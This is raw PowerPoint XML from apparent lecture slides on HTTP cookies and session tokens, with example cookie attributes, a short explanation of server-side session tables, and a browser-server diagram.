              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>value </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>u2</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>domain </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>.site.com</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>path </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2865"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>non-secure</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2795185-8984-2045-BE56-0465577F6312}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4907915" y="4724400"/>
            <a:ext cx="4007485" cy="1498600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="135890" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1070"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=u2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="250"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=u2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>       cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=u1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=u2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291663405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CCAC4F-C84F-1C4D-81B0-7EEE7DE17BE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Token</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48FB4DFC-203C-854F-99FE-40D0AADA1854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server assigns a session token to each user after they logged in, places it in the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server keeps a table of username to current session token, so when it sees the session token it knows which user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="410132433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6DFB82-290A-944A-A89D-6806FBB127CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>HTTP Session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86FF81E9-8431-E34C-A5D8-535BAA4331AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2133600"/>
            <a:ext cx="1447800" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1447800" h="4114800">
                <a:moveTo>
                  <a:pt x="0" y="4114800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1447800" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4114800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FD38407-9FA4-DC43-BE02-3D8E1FD02998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2133601"/>
            <a:ext cx="1447800" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1447800" h="4114800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1447800" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C091555-E269-7241-AB62-0AFBCF6E3090}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="2133600"/>
            <a:ext cx="1447800" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1447800" h="4114800">
                <a:moveTo>
                  <a:pt x="0" y="4114800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1447800" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4114800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFDEDEDB-166E-7343-9E60-EAF17BCCD4D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="2133601"/>
            <a:ext cx="1447800" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1447800" h="4114800">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1447800" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69FE0C25-DAE6-FE4A-8AA2-8AA72DD68A46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6619240" y="1666558"/>
            <a:ext cx="742950" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46197408-EDC2-F345-9D70-A42F0AEE87D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1550352" y="1666558"/>
            <a:ext cx="931544" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>ow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B23A683-9E9F-5543-A63E-FC8D160F706D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2055370" y="2267058"/>
            <a:ext cx="4269740" cy="521334"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4269740" h="521335">
                <a:moveTo>
                  <a:pt x="4058" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="37884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4153550" y="482907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4149491" y="520790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4269229" y="476142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4220720" y="445023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4157609" y="445023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4058" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4269740" h="521335">
                <a:moveTo>
                  <a:pt x="4161668" y="407140"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4157609" y="445023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4220720" y="445023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4161668" y="407140"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="40458C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{568873D0-2814-9641-AD71-0E94BC6A869D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
